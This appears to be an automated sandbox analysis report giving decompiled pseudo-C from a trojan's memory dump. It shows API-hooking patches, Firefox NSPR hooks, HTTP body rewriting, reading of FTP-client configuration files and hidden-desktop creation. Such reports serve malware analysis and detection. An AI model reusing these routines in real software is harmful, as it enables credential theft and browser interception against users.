								if(E00410561( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
									_t155 = _v40;
									_t186 = E004163F1( *((intOrPtr*)(_t176 + 0x18)) -  *((intOrPtr*)(_t199 + 0x3c)) +  *((intOrPtr*)(_t199 + 0x38)) + _t155 + 0x14);
									_v40 = _t186;
									if(_t186 != 0) {
										_t131 = E0041645D(_t186,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t199 + 0x38)));
										_push(_t155);
										if(( *(_t199 + 0x30) & 0x00000002) == 0) {
											E00416BCA(_t199 + 0x28);
											_t188 = E0041B3CD(_t186,  *((intOrPtr*)(_t199 + 0x40)), "Content-Length",  &_v36) + _v60;
											E0041645D(_t188,  *((intOrPtr*)(_t199 + 0x18)), _t155);
											_t189 = _t188 + _t155;
											__eflags = _t189;
										} else {
											_push("%x\r\n");
											_t191 = _t186 + _t131;
											_t177 = 0xd;
											_t192 = _t191 + E00417158(_t131, _t177, _t191);
											E0041645D(_t192, _v48, _t155);
											_t193 = _t192 + _t155;
											E0041645D(_t193, "\r\n0\r\n\r\n", 7);
											_t176 = _v60;
											_t189 = _t193 + 7;
										}
										_t137 =  *((intOrPtr*)(_t176 + 0x18));
										if( *((intOrPtr*)(_t199 + 0x3c)) !=  *((intOrPtr*)(_t176 + 0x18))) {
											_t189 = _t189 + E0041645D(_t189,  *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t199 + 0x3c)), _t137 -  *((intOrPtr*)(_t199 + 0x3c)));
										}
										E00416421( *((intOrPtr*)(_t176 + 0x14)));
										_t139 = _v44;
										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
									}
								}
								_v44 = _v44 | 0xffffffff;
								E00416421(_v48);
							}
							_t153 = 0x422fac;
						}
						if(_v52 <= 0) {
							L29:
							if(__eflags == 0) {
								L31:
								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
								 *((intOrPtr*)(_t176 + 0x34)) = 0;
								 *((intOrPtr*)(_t176 + 0x14)) = 0;
								 *((intOrPtr*)(_t176 + 0x18)) = 0;
								E00410A7F( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
								_t103 = _v40;
								 *((intOrPtr*)(_t176 + 0x10)) = 0;
								 *((intOrPtr*)(_t176 + 0xc)) = 0;
								goto L32;
							}
							__eflags = _v44 - 0xffffffff;
							if(_v44 != 0xffffffff) {
								goto L37;
							}
							goto L31;
						} else {
							if(_v44 != 0) {
								__eflags = _v52;
								goto L29;
							}
							_push(0);
							_push(0xffffe892);
							goto L36;
						}
					}
					_t149 = _t108 * 0x38 +  *0x422fc8;
					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
					_t11 = _t149 + 0x14; // -4337588
					if(E004163AC( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
						goto L35;
					}
					_t168 = _v52;
					goto L11;
				}
			}

0x0040d028
0x0040d02e
0x0040d033
0x0040d038
0x0040d325
0x0040d32c
0x00000000
0x0040d052
0x0040d058
0x0040d05e
0x0040d060
0x0040d068
0x0040d31e
0x0040d31f
0x00000000
0x0040d31f
0x0040d071
0x0040d07b
0x0040d2b7
0x0040d2ba
0x0040d2bd
0x0040d2bd
0x0040d2c0
0x0040d2c5
0x0040d2d1
0x0040d2d6
0x0040d2dc
0x0040d2df
0x0040d2ed
0x0040d2ed
0x0040d2f3
0x0040d2f9
0x0040d335
0x0040d33b
0x0040d33b
0x0040d085
0x00000000
0x00000000
0x0040d08c
0x0040d099
0x0040d09f
0x0040d0a2
0x0040d0a9
0x0040d318
0x0040d318
0x00000000
0x0040d318
0x0040d0b0
0x0040d0b2
0x0040d0b7
0x0040d0bc
0x0040d2fd
0x0040d2fd
0x0040d2ff
0x0040d304
0x0040d304
0x0040d30a
0x0040d311
0x0040d312
0x00000000
0x0040d312
0x0040d0c2
0x0040d0c8
0x0040d0ec
0x0040d0ef
0x0040d0f5
0x0040d0fb
0x0040d108
0x0040d10d
0x0040d10d
0x0040d11a
0x0040d11f
0x0040d126
0x0040d14a
0x0040d14f
0x0040d156
0x0040d176
0x0040d183
0x0040d194
0x0040d196
0x0040d19c
0x0040d1ab
0x0040d1b5
0x0040d1b6
0x0040d1f2
0x0040d212
0x0040d217
0x0040d21c
0x0040d21c
0x0040d1b8
0x0040d1b8
0x0040d1bf
0x0040d1c1
0x0040d1ce
0x0040d1d1
0x0040d1dd
0x0040d1e0
0x0040d1e5
0x0040d1e9
0x0040d1e9
0x0040d21e
0x0040d225
0x0040d23a
0x0040d23a
0x0040d23f
0x0040d244
0x0040d24a
0x0040d24d
0x0040d24d
0x0040d19c
0x0040d254
0x0040d259
0x0040d259
0x0040d25e
0x0040d25e
0x0040d269
0x0040d280
0x0040d280
0x0040d28d
0x0040d293
0x0040d299
0x0040d29f
0x0040d2a2
0x0040d2a5
0x0040d2a8
0x0040d2ad
0x0040d2b1
0x0040d2b4
0x00000000
0x0040d2b4
0x0040d282
0x0040d287
0x00000000
0x00000000
0x00000000
0x0040d26b
0x0040d26f
0x0040d27c
0x00000000
0x0040d27c
0x0040d271
0x0040d272
0x00000000
0x0040d272
0x0040d269
0x0040d0cd
0x0040d0d6
0x0040d0d8
0x0040d0e2
0x00000000
0x00000000
0x0040d0e8
0x00000000
0x0040d0e8

APIs

Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8

EnterCriticalSection.KERNEL32(00422FAC), ref: 0040D05E
LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D08C
EnterCriticalSection.KERNEL32(00422FAC), ref: 0040D0B0
LeaveCriticalSection.KERNEL32(00422FAC,00000000,?,00000000), ref: 0040D2F3
LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D312

Part of subcall function 0041B3CD: StrCmpNIA.SHLWAPI(00000000,?,?,00000000,?,-00422FC8,?,00000000), ref: 0041B427

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

LeaveCriticalSection.KERNEL32(00422FAC), ref: 0040D31F

Strings

Content-Length, xrefs: 0040D1FC
%x, xrefs: 0040D1B8
0, xrefs: 0040D1D8

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
String ID: 0$%x$Content-Length
API String ID: 4067213518-3838797520
Opcode ID: 65d216880ea404408304fc33fecaaf6347815953f6bc3d160ff28ffe37a3f1e7
Instruction ID: b79c8f3c0824c7d15e525eba73c27aadf84a4689f865ac7025aba4dc54dbab24
Opcode Fuzzy Hash: 65d216880ea404408304fc33fecaaf6347815953f6bc3d160ff28ffe37a3f1e7
Instruction Fuzzy Hash: E291A072904316AFC710DF65CD8196ABBB5FF84314F01462EF850A72A1C738E999CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00413D4A, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00413D4A(char* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v64;
				char _v84;
				char _v108;
				char _v152;
				char _v180;
				char _v252;
				short _v766;
				char _v772;
				short _v1292;
				void* __edi;
				void* __esi;
				void* _t46;
				void* _t48;
				void* _t53;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t68;
				void* _t70;
				void* _t75;
				WCHAR* _t100;
				signed int _t101;
				WCHAR* _t103;
				char* _t108;
				intOrPtr _t109;
				void* _t112;
				intOrPtr _t125;

				_t99 = __edx;
				_t98 = __ecx;
				E004164D4( &_v12,  &_v12, 0, 8);
				_t46 = 0x6a;
				E004159A4(_t46,  &_v252);
				_t48 = 0x6b;
				E004159A4(_t48,  &_v108);
				_t100 =  &_v772;
				_t53 = E0041A545(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
				if(_t53 != 0xffffffff) {
					_t115 = _t53;
					if(_t53 != 0) {
						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
						E00413B5E(_t99, _t115,  &_v1292,  &_v12);
						PathRemoveFileSpecW( &_v1292);
					}
				}
				_t101 = 0;
				if(_v8 != 0) {
					L14:
					_t125 = _v8;
					goto L15;
				} else {
					_t57 = 0x6d;
					E004159A4(_t57,  &_v64);
					_t59 = 0x6e;
					E004159A4(_t59,  &_v152);
					_t108 =  &_v84;
					_t61 = 0x6f;
					E004159A4(_t61, _t108);
					_v24 =  &_v64;
					_v20 =  &_v152;
					_v40 = 0x24;
					_v36 = 0x1a;
					_v32 = 0x26;
					_v28 = 0x23;
					_v16 = _t108;
					do {
						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
						if(0 == 0) {
							_t118 = _t109 - 0x24;
							if(_t109 == 0x24) {
								E00413B1C(_t118,  &_v772,  &_v12, 0);
								_v766 = 0;
							}
							_t99 =  &_v24;
							_t98 =  &_v772;
							E0041BB58( &_v772,  &_v24, 0, 3, 2, E00413D01,  &_v12, 0, 0, 0);
						}
						_t101 = _t101 + 1;
					} while (_t101 < 4);
					if(_v8 != 0) {
						L15:
						if(_t125 <= 0) {
							return E00416421(_v12);
						}
						_push(0xcb);
						return E0041252D(_t99, _v12, 0x70);
					}
					_t68 = 0x6a;
					E004159A4(_t68,  &_v180);
					_t70 = 0x6c;
					E004159A4(_t70,  &_v64);
					_t103 =  &_v772;
					_t75 = E0041A545(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
					if(_t75 != 0xffffffff) {
						_t124 = _t75;
						if(_t75 != 0) {
							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
							E00413B1C(_t124,  &_v1292,  &_v12, 1);
						}
					}
					goto L14;
				}
			}

0x00413d4a
0x00413d4a
0x00413d5e
0x00413d6b
0x00413d6c
0x00413d76
0x00413d77
0x00413d8c
0x00413d97
0x00413d9f
0x00413da1
0x00413da3
0x00413db0
0x00413dc1
0x00413dcd
0x00413dcd
0x00413da3
0x00413dd3
0x00413dd8
0x00413ef8
0x00413ef8
0x00000000
0x00413dde
0x00413de3
0x00413de4
0x00413df1
0x00413df2
0x00413df9
0x00413dfc
0x00413dfd
0x00413e05
0x00413e0e
0x00413e13
0x00413e1a
0x00413e21
0x00413e28
0x00413e2f
0x00413e32
0x00413e32
0x00413e43
0x00413e4b
0x00413e4d
0x00413e50
0x00413e5e
0x00413e65
0x00413e65
0x00413e7e
0x00413e81
0x00413e87
0x00413e87
0x00413e8c
0x00413e8d
0x00413e96
0x00413efc
0x00413efc
0x00000000
0x00413f13
0x00413f01
0x00000000
0x00413f09
0x00413ea0
0x00413ea1
0x00413eab
0x00413eac
0x00413ebc
0x00413ec7
0x00413ecf
0x00413ed1
0x00413ed3
0x00413ee0
0x00413ef3
0x00413ef3
0x00413ed3
0x00000000
0x00413ecf

APIs

Part of subcall function 0041A545: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040754A,?,?,00000104,.exe,00000000), ref: 0041A55A

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 00413DB0

Part of subcall function 00413B5E: GetPrivateProfileStringW.KERNEL32 ref: 00413B95
Part of subcall function 00413B5E: StrStrIW.SHLWAPI(00000001,?), ref: 00413C1D
Part of subcall function 00413B5E: StrStrIW.SHLWAPI(00000001,?), ref: 00413C2E
Part of subcall function 00413B5E: GetPrivateProfileStringW.KERNEL32 ref: 00413C4A
Part of subcall function 00413B5E: GetPrivateProfileStringW.KERNEL32 ref: 00413C68

PathRemoveFileSpecW.SHLWAPI(?,?,?,?,00000000,00000001), ref: 00413DCD

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 00413E43
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000001), ref: 00413EE0

Strings

#, xrefs: 00413E28
&, xrefs: 00413E21
$, xrefs: 00413E13

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
String ID: #$$$&
API String ID: 1517737059-1941049543
Opcode ID: e53d9ea83cd61b8c6056cc9146267e2fa861d4e963f54beda8ed8aa734ca7465
Instruction ID: bddb939744c3425734fa5753ee56284869025959f91dd19fffc08ca44088247c
Opcode Fuzzy Hash: e53d9ea83cd61b8c6056cc9146267e2fa861d4e963f54beda8ed8aa734ca7465
Instruction Fuzzy Hash: A1512CB2E00219AADF10DBA5DC45FEF77BCAB08315F0004A7B518F7181DB78AB858B65

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC64, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 108
injectionCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041AC64(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, char _a8) {
				char _v8;
				DWORD* _v12;
				intOrPtr _v47;
				void _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t48;
				void* _t59;
				intOrPtr _t62;
				void* _t64;
				intOrPtr* _t67;
				long _t69;
				DWORD* _t70;
				void* _t72;

				_t64 = __edx;
				_t62 = __ecx;
				_t59 = __eax;
				_t70 = 0;
				_v12 = 0;
				if(E0041AC1F(_a4) < 0x1e) {
					L18:
					return _v12;
				}
				_t3 =  &_v8; // 0x406353
				if(VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40, _t3) == 0) {
					goto L18;
				}
				E004164D4( &_v48,  &_v48, 0xffffff90, 0x23);
				if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
					L17:
					_t31 =  &_v8; // 0x406353
					_t32 =  &_v8; // 0x406353
					VirtualProtectEx(0xffffffff, _a4, 0x1e,  *_t32, _t31);
					goto L18;
				} else {
					_t67 =  &_v48;
					_push(0);
					_push(_t67);
					while(1) {
						_t48 = E0041D940(_t59, _t62, _t64, _t67, _t70);
						if(_t48 == 0xffffffff) {
							break;
						}
						_t70 = _t70 + _t48;
						if(_t70 > 0x1e) {
							L16:
							goto L17;
						}
						_t62 =  *_t67;
						if(_t62 == 0xe9 || _t62 == 0xe8) {
							if(_t48 == 5) {
								_t10 =  &_a8; // 0x422020
								 *((intOrPtr*)(_t67 + 1)) =  *((intOrPtr*)(_t67 + 1)) + _a4 -  *_t10;
							}
						}
						_push(0);
						if(_t70 >= 5) {
							_t16 =  &_a8; // 0x422020
							_t17 = _t70 + 5; // 0x5
							_t69 = _t17;
							 *((intOrPtr*)(_t72 + _t70 - 0x2b)) = _a4 -  *_t16 - 5;
							_t21 =  &_a8; // 0x422020
							 *((char*)(_t72 + _t70 - 0x2c)) = 0xe9;
							if(WriteProcessMemory(0xffffffff,  *_t21,  &_v48, _t69, ??) != 0) {
								_v48 = 0xe9;
								_v47 = _t59 - _a4 - 5;
								E004097C8(_a4, _a8);
								if(WriteProcessMemory(0xffffffff, _a4,  &_v48, 5, 0) != 0) {
									_v12 = _t69;
								}
							}
							goto L16;
						}
						_t67 = _t72 + _t70 - 0x2c;
						_push(_t67);
					}
					goto L16;
				}
			}

0x0041ac64
0x0041ac64
0x0041ac6c
0x0041ac71
0x0041ac73
0x0041ac7e
0x0041ad7a
0x0041ad80
0x0041ad80
0x0041ac84
0x0041ac99
0x00000000
0x00000000
0x0041aca7
0x0041acc0
0x0041ad66
0x0041ad66
0x0041ad6a
0x0041ad74
0x00000000
0x0041acc6
0x0041acc7
0x0041acca
0x0041accd
0x0041ad01
0x0041ad01
0x0041ad09
0x00000000
0x00000000
0x0041acd0
0x0041acd5
0x0041ad65
0x00000000
0x0041ad65
0x0041acdb
0x0041ace0
0x0041acea
0x0041acef
0x0041acf2
0x0041acf2
0x0041acea
0x0041acf5
0x0041acfa
0x0041ad10
0x0041ad13
0x0041ad13
0x0041ad19
0x0041ad22
0x0041ad25
0x0041ad36
0x0041ad43
0x0041ad47
0x0041ad4a
0x0041ad60
0x0041ad62
0x0041ad62
0x0041ad60
0x00000000
0x0041ad36
0x0041acfc
0x0041ad00
0x0041ad00
0x00000000
0x0041ad0b

APIs

Part of subcall function 0041AC1F: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,00409768,00000000,00000000,00000034,00409AF3,00422020,00000000), ref: 0041AC34

VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,Sc@,-00000008,00000034,?,?,00409889,?,00000000,?,?,00409AF3,00422020), ref: 0041AC91
ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,00409889,?,00000000,?,?,00409AF3), ref: 0041ACB8
WriteProcessMemory.KERNEL32(000000FF, B,?,00000005,00000000,?,00000000,00000000,?,?,00409889,?,00000000,?,?,00409AF3), ref: 0041AD32
WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000,?,?,00409889,?,00000000,?,?,00409AF3,00422020,00000000,00406353), ref: 0041AD5C
VirtualProtectEx.KERNEL32(000000FF,?,0000001E,Sc@,Sc@,?,?,00409889,?,00000000,?,?,00409AF3,00422020,00000000,00406353), ref: 0041AD74

Strings

Sc@, xrefs: 0041AC84, 0041AD66, 0041AD6A, 0041AC87, 0041AD69
B, xrefs: 0041AD10, 0041AD22, 0041ACEF

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
String ID: B$Sc@
API String ID: 390532180-250100105
Opcode ID: 0310db3361ac4e395d786e6527b8ef25ca97a18a28826150dd6aaeac143752bf
Instruction ID: 90dc8cfd6ff97a8c132ed1c6253f4bbbebe219de32212669c53059d58c3e6a6f
Opcode Fuzzy Hash: 0310db3361ac4e395d786e6527b8ef25ca97a18a28826150dd6aaeac143752bf
Instruction Fuzzy Hash: 9E317372900218BFDF209FB8DD44EDE7B69AB09730F548317F925A61D0D734D9908BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C833, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C833(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t14;

				 *0x422fc8 =  *0x422fc8 & 0x00000000;
				 *0x422fcc =  *0x422fcc & 0x00000000;
				_t14 = __eax;
				InitializeCriticalSection(0x422fac);
				 *0x422fc4 = _a4;
				 *0x422fa0 = _a8;
				 *0x422fd0 = _a12;
				 *0x422fa4 = _t14;
				 *0x422f9c = _a16;
				 *0x422e0c = GetProcAddress(_t14, "PR_GetNameForIdentity");
				 *0x422fa8 = GetProcAddress( *0x422fa4, "PR_SetError");
				_t12 = GetProcAddress( *0x422fa4, "PR_GetError");
				 *0x42293c = _t12;
				return _t12;
			}

0x0040c833
0x0040c83a
0x0040c847
0x0040c849
0x0040c853
0x0040c85c
0x0040c86a
0x0040c873
0x0040c880
0x0040c892
0x0040c8a4
0x0040c8a9
0x0040c8ab
0x0040c8b1

APIs

InitializeCriticalSection.KERNEL32(00422FAC,74B04EE0,00409B63,00422360), ref: 0040C849
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040C885
GetProcAddress.KERNEL32(PR_SetError), ref: 0040C897
GetProcAddress.KERNEL32(PR_GetError), ref: 0040C8A9

Strings

PR_GetNameForIdentity, xrefs: 0040C865
PR_GetError, xrefs: 0040C899
PR_SetError, xrefs: 0040C887

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CriticalInitializeSection
String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
API String ID: 2804437462-2578621715
Opcode ID: 12880adac82c6ab04e09574cbf302326f1eea9c5a03b9cc43618ca6edcfd8a2f
Instruction ID: c920c9481774fa4c86e73df937350f16fb8402cb5207169412b442e858372ce5
Opcode Fuzzy Hash: 12880adac82c6ab04e09574cbf302326f1eea9c5a03b9cc43618ca6edcfd8a2f
Instruction Fuzzy Hash: 0B019274A00310BFC720DF65EF44A067FF4FB48361B92483AE804A72A1D7B49442EF98

Uniqueness

Uniqueness Score: -1.00%

Function 0041CED0, Relevance: 12.2, APIs: 8, Instructions: 180
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0041CED0(void* __edx, intOrPtr* _a4) {
				char _v524;
				char _v544;
				char _v556;
				intOrPtr _v572;
				char _v924;
				char _v1028;
				char _v1040;
				char _v1060;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1120;
				char* _v1124;
				intOrPtr _v1128;
				char _v1132;
				intOrPtr _v1144;
				signed short _v1146;
				char _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1157;
				signed int _v1160;
				void* _v1164;
				void* _v1168;
				char _v1177;
				char _v1180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				void* _t62;
				signed int _t71;
				char _t77;
				char* _t85;
				char _t88;
				char _t95;
				short _t100;
				intOrPtr* _t105;
				void* _t111;
				char _t112;
				signed int _t118;
				signed int _t119;
				void* _t123;

				_t111 = __edx;
				_t105 = _a4;
				_t59 =  *(_t105 + 4);
				_push(_t118);
				_t119 = _t118 | 0xffffffff;
				_v1152 = _t119;
				_v1156 = _t119;
				if(_t59 == _t119 || _t59 == 0xfffffffe) {
					L4:
					_t62 = E00416AA0( *((intOrPtr*)( *_t105 + 8)), _t108, 0);
					_t109 =  *_t105;
					_t63 = E004194AA(_t62,  *_t105,  *((intOrPtr*)( *_t105 + 4)));
					_v1160 = _t63;
					_t133 = _t63 - _t119;
					if(_t63 == _t119) {
						goto L20;
					}
					E0041981C(_t109, _t63);
					E004197DA(_v1160);
					_push(_t105 + 8);
					_push(3);
					_push(_v1164);
					_t123 = 4;
					if(E0041CAC7(_t109, _t123, _t133) == 0) {
						goto L20;
					}
					_t71 =  *(_t105 + 4);
					if(_t71 == 0xfffffffe) {
						SetThreadPriority(GetCurrentThread(), 1);
						E00406762(0x2937498d,  &_v1028, 0);
						_t63 = E00405A43(_t109, __eflags,  &_v1040);
						__eflags = _t63;
						if(_t63 == 0) {
							goto L20;
						}
						_t77 = E0040809E(_t109, _t111,  &_v924, 1);
						__eflags = _t77;
						if(_t77 == 0) {
							L19:
							_t63 = E00408309( &_v924, 1);
							goto L20;
						} else {
							__imp__GetShellWindow();
							__eflags = _t77;
							_v1157 = _t77 != 0;
							__eflags = _v1157;
							if(_v1157 == 0) {
								E004159A4(0xa8,  &_v1132);
								_t85 =  &_v524;
								__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t85);
								__eflags = _t85;
								if(_t85 == 0) {
									_t88 = E0041BCB4( &_v1132,  &_v544,  &_v544);
									__eflags = _t88;
									if(_t88 != 0) {
										_t112 = 0x44;
										E004164D4( &_v1120,  &_v1120, 0, _t112);
										_v1124 =  &_v1060;
										_v1132 = _t112;
										_t95 = E00417CE8( &_v556, 0, 0,  &_v1132,  &_v1180);
										__eflags = _t95;
										if(_t95 != 0) {
											WaitForSingleObject(_v1168, 0x1388);
											CloseHandle(_v1164);
											CloseHandle(_v1168);
											_v1177 = 1;
										}
									}
								}
							}
							SystemParametersInfoW(0x1003, 0, 0, 0);
							__eflags = _v1157 - 1;
							if(__eflags == 0) {
								_v1132 =  &_v924;
								_v1128 = 0x408513;
								_v1124 = 0x408516;
								_v1120 = E00408519;
								_v1116 = E0040853D;
								_v1112 = E00408584;
								_v1108 = E004085B9;
								_v1104 = 0x408513;
								E0040AE91(__eflags, _v1156,  &_v1132, _v924, _v572);
							}
							goto L19;
						}
					} else {
						if(_t71 == 0xffffffff) {
							_t63 = E0040E4BF(_v1156, _t109);
						} else {
							_push(_v1152);
							_t63 = E0041961D(_v1156);
							_t105 = _a4;
						}
						goto L20;
					}
				} else {
					_t100 = 2;
					_v1148 = _t100;
					_t108 =  *(_t105 + 4) << 8;
					_v1146 =  *(_t105 + 5) & 0x000000ff |  *(_t105 + 4) << 0x00000008;
					_v1144 = 0x100007f;
					_t63 = E00419469( &_v1148);
					_v1152 = _t63;
					if(_t63 == _t119) {
						L20:
						E004197C4(E004197C4(_t63, _v1156), _v1152);
						E00416421(_t105);
						return 0;
					} else {
						E0041981C(_t108, _t63);
						goto L4;
					}
				}
			}

0x0041ced0
0x0041cedd
0x0041cee0
0x0041cee3
0x0041cee4
0x0041cee8
0x0041ceec
0x0041cef2
0x0041cf38
0x0041cf3f
0x0041cf44
0x0041cf49
0x0041cf4e
0x0041cf52
0x0041cf54
0x00000000
0x00000000
0x0041cf5b
0x0041cf64
0x0041cf6c
0x0041cf6d
0x0041cf6f
0x0041cf75
0x0041cf7d
0x00000000
0x00000000
0x0041cf83
0x0041cf89
0x0041cfbc
0x0041cfd2
0x0041cfdf
0x0041cfe4
0x0041cfe6
0x00000000
0x00000000
0x0041cff5
0x0041cffa
0x0041cffc
0x0041d128
0x0041d131
0x00000000
0x0041d002
0x0041d002
0x0041d008
0x0041d00a
0x0041d00f
0x0041d014
0x0041d023
0x0041d028
0x0041d035
0x0041d03b
0x0041d03d
0x0041d04a
0x0041d04f
0x0041d051
0x0041d055
0x0041d05d
0x0041d069
0x0041d081
0x0041d085
0x0041d08a
0x0041d08c
0x0041d097
0x0041d0a7
0x0041d0ad
0x0041d0af
0x0041d0af
0x0041d08c
0x0041d051
0x0041d03d
0x0041d0bc
0x0041d0c2
0x0041d0c7
0x0041d0de
0x0041d0eb
0x0041d0f3
0x0041d0fb
0x0041d103
0x0041d10b
0x0041d113
0x0041d11b
0x0041d123
0x0041d123
0x00000000
0x0041d0c7
0x0041cf8b
0x0041cf8e
0x0041cfa9
0x0041cf90
0x0041cf90
0x0041cf98
0x0041cf9d
0x0041cf9d
0x00000000
0x0041cf8e
0x0041cef9
0x0041ceff
0x0041cf00
0x0041cf09
0x0041cf14
0x0041cf19
0x0041cf21
0x0041cf26
0x0041cf2c
0x0041d136
0x0041d143
0x0041d149
0x0041d156
0x0041cf32
0x0041cf33
0x00000000
0x0041cf33
0x0041cf2c

APIs

Part of subcall function 00419469: socket.WS2_32(?,00000001,00000006), ref: 00419472
Part of subcall function 00419469: connect.WS2_32(00000000,?,-0000001D), ref: 00419492
Part of subcall function 00419469: closesocket.WS2_32(00000000), ref: 0041949D

Part of subcall function 0041981C: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00419832

GetCurrentThread.KERNEL32 ref: 0041CFB5
SetThreadPriority.KERNEL32(00000000), ref: 0041CFBC

Part of subcall function 00405A43: OpenWindowStationW.USER32 ref: 00405A68
Part of subcall function 00405A43: CreateWindowStationW.USER32 ref: 00405A7B
Part of subcall function 00405A43: GetProcessWindowStation.USER32 ref: 00405A8C
Part of subcall function 00405A43: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 00405AC7
Part of subcall function 00405A43: CreateDesktopW.USER32 ref: 00405ADB
Part of subcall function 00405A43: GetCurrentThreadId.KERNEL32 ref: 00405AE7
Part of subcall function 00405A43: GetThreadDesktop.USER32(00000000), ref: 00405AEE
Part of subcall function 00405A43: SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 00405B00
Part of subcall function 00405A43: CloseDesktop.USER32(00000000,00000000,00000000), ref: 00405B12
Part of subcall function 00405A43: CloseWindowStation.USER32(?,?), ref: 00405B2D

Part of subcall function 0040809E: TlsAlloc.KERNEL32(00422E10,00000000,0000018C,00000000,00000000), ref: 004080B7

GetShellWindow.USER32 ref: 0041D002
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 0041D035

